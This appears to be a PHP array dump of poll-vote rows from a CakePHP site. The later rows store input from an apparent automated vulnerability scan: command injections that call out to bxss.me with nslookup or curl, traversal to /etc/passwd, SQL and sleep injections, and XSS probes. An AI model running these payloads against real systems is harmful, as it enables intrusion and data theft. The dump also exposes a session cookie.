'sondage_id' => '2'
),
(int) 4001 => array(
'id' => '4544',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4002 => array(
'id' => '4545',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4003 => array(
'id' => '4546',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4004 => array(
'id' => '4547',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4005 => array(
'id' => '4548',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4006 => array(
'id' => '4549',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4007 => array(
'id' => '4550',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4008 => array(
'id' => '4551',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4009 => array(
'id' => '4552',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4010 => array(
'id' => '4553',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4011 => array(
'id' => '4554',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4012 => array(
'id' => '4555',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4013 => array(
'id' => '4556',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4014 => array(
'id' => '4557',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4015 => array(
'id' => '4558',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4016 => array(
'id' => '4559',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4017 => array(
'id' => '4560',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4018 => array(
'id' => '4561',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4019 => array(
'id' => '4562',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4020 => array(
'id' => '4563',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4021 => array(
'id' => '4564',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4022 => array(
'id' => '4565',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4023 => array(
'id' => '4566',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4024 => array(
'id' => '4567',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4025 => array(
'id' => '4568',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4026 => array(
'id' => '4569',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4027 => array(
'id' => '4570',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4028 => array(
'id' => '4571',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4029 => array(
'id' => '4572',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4030 => array(
'id' => '4573',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4031 => array(
'id' => '4574',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4032 => array(
'id' => '4575',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4033 => array(
'id' => '4576',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4034 => array(
'id' => '4577',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4035 => array(
'id' => '4578',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4036 => array(
'id' => '4579',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4037 => array(
'id' => '4580',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4038 => array(
'id' => '4581',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4039 => array(
'id' => '4582',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4040 => array(
'id' => '4583',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4041 => array(
'id' => '4584',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4042 => array(
'id' => '4585',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4043 => array(
'id' => '4586',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4044 => array(
'id' => '4587',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4045 => array(
'id' => '4588',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4046 => array(
'id' => '4589',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4047 => array(
'id' => '4590',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4048 => array(
'id' => '4591',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4049 => array(
'id' => '4592',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4050 => array(
'id' => '4593',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4051 => array(
'id' => '4594',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4052 => array(
'id' => '4595',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4053 => array(
'id' => '4596',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4054 => array(
'id' => '4597',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4055 => array(
'id' => '4598',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4056 => array(
'id' => '4599',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4057 => array(
'id' => '4600',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4058 => array(
'id' => '4601',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4059 => array(
'id' => '4602',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4060 => array(
'id' => '4603',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4061 => array(
'id' => '4604',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4062 => array(
'id' => '4605',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4063 => array(
'id' => '4606',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4064 => array(
'id' => '4607',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4065 => array(
'id' => '4608',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4066 => array(
'id' => '4609',
'ip' => '45.137.76.29',
'ip1' => 'CAKEPHP=84fc8c11880852156186df41f25ac201',
'sondage_id' => '2'
),
(int) 4067 => array(
'id' => '4610',
'ip' => '45.11.82.145',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4068 => array(
'id' => '4611',
'ip' => '45.11.82.145',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4069 => array(
'id' => '4612',
'ip' => '45.11.82.145',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4070 => array(
'id' => '4613',
'ip' => '45.11.82.145',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4071 => array(
'id' => '4614',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4072 => array(
'id' => '4615',
'ip' => '45.11.82.145',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4073 => array(
'id' => '4616',
'ip' => '45.11.82.145',
'ip1' => 'wvstest=javascript:domxssExecutionSink(1,',
'sondage_id' => '2'
),
(int) 4074 => array(
'id' => '4617',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4075 => array(
'id' => '4618',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4076 => array(
'id' => '4619',
'ip' => 'PE7UP7ni',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4077 => array(
'id' => '4620',
'ip' => '45.137.76.29',
'ip1' => 'response.write(9665601*9671827)',
'sondage_id' => '2'
),
(int) 4078 => array(
'id' => '4621',
'ip' => '45.137.76.29',
'ip1' => ''+response.write(9665601*9671827)+'',
'sondage_id' => '2'
),
(int) 4079 => array(
'id' => '4622',
'ip' => '45.137.76.29',
'ip1' => '"+response.write(9665601*9671827)+"',
'sondage_id' => '2'
),
(int) 4080 => array(
'id' => '4623',
'ip' => 'aCUZJ3Fl: sGyJUeQc',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4081 => array(
'id' => '4624',
'ip' => '45.137.76.29',
'ip1' => 'Z0QA1f1B',
'sondage_id' => '2'
),
(int) 4082 => array(
'id' => '4625',
'ip' => '45.137.76.29',
'ip1' => 'gGkKbMZO: 5pTvPI2Z',
'sondage_id' => '2'
),
(int) 4083 => array(
'id' => '4626',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4084 => array(
'id' => '4627',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4085 => array(
'id' => '4628',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4086 => array(
'id' => '4629',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4087 => array(
'id' => '4630',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4088 => array(
'id' => '4631',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4089 => array(
'id' => '4632',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4090 => array(
'id' => '4633',
'ip' => '45.137.76.29',
'ip1' => '',
'sondage_id' => '2'
),
(int) 4091 => array(
'id' => '4634',
'ip' => '45.137.76.29',
'ip1' => '<pre class=<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 4092 => array(
'id' => '4635',
'ip' => 'file:///etc/passwd',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4093 => array(
'id' => '4636',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4094 => array(
'id' => '4637',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4095 => array(
'id' => '4638',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4096 => array(
'id' => '4639',
'ip' => '../45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4097 => array(
'id' => '4640',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4098 => array(
'id' => '4641',
'ip' => '${9999092+9999446}',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4099 => array(
'id' => '4642',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 4100 => array(
'id' => '4643',
'ip' => '45.137.76.29',
'ip1' => '${9999604+9999410}',
'sondage_id' => '2'
),
(int) 4101 => array(
'id' => '4644',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 4102 => array(
'id' => '4645',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4103 => array(
'id' => '4646',
'ip' => '45.137.76.29',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 4104 => array(
'id' => '4647',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4105 => array(
'id' => '4648',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4106 => array(
'id' => '4649',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4107 => array(
'id' => '4650',
'ip' => '45.137.76.29',
'ip1' => '../<pre class=',
'sondage_id' => '2'
),
(int) 4108 => array(
'id' => '4651',
'ip' => '45.137.76.29',
'ip1' => '<pre class=&n925601=v916276',
'sondage_id' => '2'
),
(int) 4109 => array(
'id' => '4652',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4110 => array(
'id' => '4653',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4111 => array(
'id' => '4654',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4112 => array(
'id' => '4655',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4113 => array(
'id' => '4656',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4114 => array(
'id' => '4657',
'ip' => '45.137.76.29',
'ip1' => 'echo srtsmk$()\ piqwwp\nz^xyu||a #' &echo srtsmk$()\ piqwwp\nz^xyu||a #|" &echo srtsmk$()\ piqwwp\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 4115 => array(
'id' => '4658',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4116 => array(
'id' => '4659',
'ip' => '45.137.76.29',
'ip1' => '&echo wvrobm$()\ jasqwc\nz^xyu||a #' &echo wvrobm$()\ jasqwc\nz^xyu||a #|" &echo wvrobm$()\ jasqwc\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 4117 => array(
'id' => '4660',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4118 => array(
'id' => '4661',
'ip' => ')',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4119 => array(
'id' => '4662',
'ip' => '45.137.76.29',
'ip1' => '<pre class=&echo tkxxfp$()\ dxkocu\nz^xyu||a #' &echo tkxxfp$()\ dxkocu\nz^xyu||a #|" &echo tkxxfp$()\ dxkocu\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 4120 => array(
'id' => '4663',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4121 => array(
'id' => '4664',
'ip' => '!(()&&!|*|*|',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4122 => array(
'id' => '4665',
'ip' => '45.137.76.29',
'ip1' => '|echo tbydzq$()\ aigiqq\nz^xyu||a #' |echo tbydzq$()\ aigiqq\nz^xyu||a #|" |echo tbydzq$()\ aigiqq\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 4123 => array(
'id' => '4666',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4124 => array(
'id' => '4667',
'ip' => '^(#$!@#$)(()))******',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4125 => array(
'id' => '4668',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4126 => array(
'id' => '4669',
'ip' => '45.137.76.29',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 4127 => array(
'id' => '4670',
'ip' => '45.137.76.29',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 4128 => array(
'id' => '4671',
'ip' => '45.137.76.29',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 4129 => array(
'id' => '4672',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4130 => array(
'id' => '4673',
'ip' => '45.137.76.29',
'ip1' => '<pre class=|echo gfffct$()\ mlrmbn\nz^xyu||a #' |echo gfffct$()\ mlrmbn\nz^xyu||a #|" |echo gfffct$()\ mlrmbn\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 4131 => array(
'id' => '4674',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4132 => array(
'id' => '4675',
'ip' => '45.137.76.29',
'ip1' => '(nslookup -q=cname hitkfjypavzyjd62ce.bxss.me||curl hitkfjypavzyjd62ce.bxss.me))',
'sondage_id' => '2'
),
(int) 4133 => array(
'id' => '4676',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4134 => array(
'id' => '4677',
'ip' => '45.137.76.29',
'ip1' => '$(nslookup -q=cname hitprodbgkyzo732a1.bxss.me||curl hitprodbgkyzo732a1.bxss.me)',
'sondage_id' => '2'
),
(int) 4135 => array(
'id' => '4678',
'ip' => '/etc/shells',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4136 => array(
'id' => '4679',
'ip' => '45.137.76.29',
'ip1' => '&nslookup -q=cname hitgnwmfhlwrk490c7.bxss.me&'\"`0&nslookup -q=cname hitgnwmfhlwrk490c7.bxss.me&`'',
'sondage_id' => '2'
),
(int) 4137 => array(
'id' => '4680',
'ip' => '45.137.76.29',
'ip1' => '&(nslookup -q=cname hituixzpafmvh6529f.bxss.me||curl hituixzpafmvh6529f.bxss.me)&'\"`0&(nslookup -q=cname hituixzpafmvh6529f.bxss.me||curl hituixzpafmvh6529f.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 4138 => array(
'id' => '4681',
'ip' => 'c:/windows/win.ini',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4139 => array(
'id' => '4682',
'ip' => '45.137.76.29',
'ip1' => '|(nslookup -q=cname hitkywptsttywbcf5c.bxss.me||curl hitkywptsttywbcf5c.bxss.me)',
'sondage_id' => '2'
),
(int) 4140 => array(
'id' => '4683',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4141 => array(
'id' => '4684',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4142 => array(
'id' => '4685',
'ip' => '45.137.76.29',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 4143 => array(
'id' => '4686',
'ip' => '45.137.76.29',
'ip1' => '`(nslookup -q=cname hitkjxrlvwdojf84dd.bxss.me||curl hitkjxrlvwdojf84dd.bxss.me)`',
'sondage_id' => '2'
),
(int) 4144 => array(
'id' => '4687',
'ip' => '45.137.76.29',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 4145 => array(
'id' => '4688',
'ip' => '45.137.76.29',
'ip1' => ';(nslookup -q=cname hitkteyfjnixy9ee2a.bxss.me||curl hitkteyfjnixy9ee2a.bxss.me)|(nslookup -q=cname hitkteyfjnixy9ee2a.bxss.me||curl hitkteyfjnixy9ee2a.bxss.me)&(nslookup -q=cname hitkteyfjnixy9ee2a.bxss.me||curl hitkteyfjnixy9ee2a.bxss.me)',
'sondage_id' => '2'
),
(int) 4146 => array(
'id' => '4689',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4147 => array(
'id' => '4690',
'ip' => '45.137.76.29',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 4148 => array(
'id' => '4691',
'ip' => '45.137.76.29',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitemcovwkzyx5bb24.bxss.me||curl${IFS}hitemcovwkzyx5bb24.bxss.me)',
'sondage_id' => '2'
),
(int) 4149 => array(
'id' => '4692',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4150 => array(
'id' => '4693',
'ip' => '45.137.76.29',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 4151 => array(
'id' => '4694',
'ip' => '45.137.76.29',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitlnoocxrvci935fb.bxss.me||curl${IFS}hitlnoocxrvci935fb.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitlnoocxrvci935fb.bxss.me||curl${IFS}hitlnoocxrvci935fb.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 4152 => array(
'id' => '4695',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4153 => array(
'id' => '4696',
'ip' => '45.137.76.29',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 4154 => array(
'id' => '4697',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 4155 => array(
'id' => '4698',
'ip' => '45.137.76.29',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 4156 => array(
'id' => '4699',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4157 => array(
'id' => '4700',
'ip' => '45.137.76.29',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 4158 => array(
'id' => '4701',
'ip' => ''"()',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4159 => array(
'id' => '4702',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4160 => array(
'id' => '4703',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4161 => array(
'id' => '4704',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4162 => array(
'id' => '4705',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4163 => array(
'id' => '4706',
'ip' => '45.137.76.29'"',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4164 => array(
'id' => '4707',
'ip' => '45.137.76.29',
'ip1' => ''.gethostbyname(lc('hitbk'.'asyohmav99b84.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(89).chr(115).chr(76).'',
'sondage_id' => '2'
),
(int) 4165 => array(
'id' => '4708',
'ip' => 'https://bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4166 => array(
'id' => '4709',
'ip' => '45.137.76.29',
'ip1' => '".gethostbyname(lc("hitss"."iibghucs4692e.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(86).chr(109).chr(77)."',
'sondage_id' => '2'
),
(int) 4167 => array(
'id' => '4710',
'ip' => '@@HiOOc',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4168 => array(
'id' => '4711',
'ip' => 'https://bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4169 => array(
'id' => '4712',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4170 => array(
'id' => '4713',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4171 => array(
'id' => '4714',
'ip' => 'https://bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4172 => array(
'id' => '4715',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4173 => array(
'id' => '4716',
'ip' => '45.137.76.29',
'ip1' => 'gethostbyname(lc('hitba'.'awlyaugf6ec76.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(78).chr(121).chr(74)',
'sondage_id' => '2'
),
(int) 4174 => array(
'id' => '4717',
'ip' => '45.137.76.29',
'ip1' => '-1 OR 2+263-263-1=0+0+0+1 -- ',
'sondage_id' => '2'
),
(int) 4175 => array(
'id' => '4718',
'ip' => '45.137.76.29',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 4176 => array(
'id' => '4719',
'ip' => '45.137.76.29',
'ip1' => '-1 OR 2+580-580-1=0+0+0+1',
'sondage_id' => '2'
),
(int) 4177 => array(
'id' => '4720',
'ip' => '45.137.76.29',
'ip1' => '<pre class='&&sleep(27*1000)*xzrbae&&'',
'sondage_id' => '2'
),
(int) 4178 => array(
'id' => '4721',
'ip' => '45.137.76.29',
'ip1' => '<pre class="&&sleep(27*1000)*zeldad&&"',
'sondage_id' => '2'
),
(int) 4179 => array(
'id' => '4722',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4180 => array(
'id' => '4723',
'ip' => '45.137.76.29',
'ip1' => '<pre class='||sleep(27*1000)*iogthv||'',
'sondage_id' => '2'
),
(int) 4181 => array(
'id' => '4724',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4182 => array(
'id' => '4725',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4183 => array(
'id' => '4726',
'ip' => '45.137.76.29',
'ip1' => '<pre class="||sleep(27*1000)*yngubp||"',
'sondage_id' => '2'
),
(int) 4184 => array(
'id' => '4727',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4185 => array(
'id' => '4728',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 4186 => array(
'id' => '4729',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
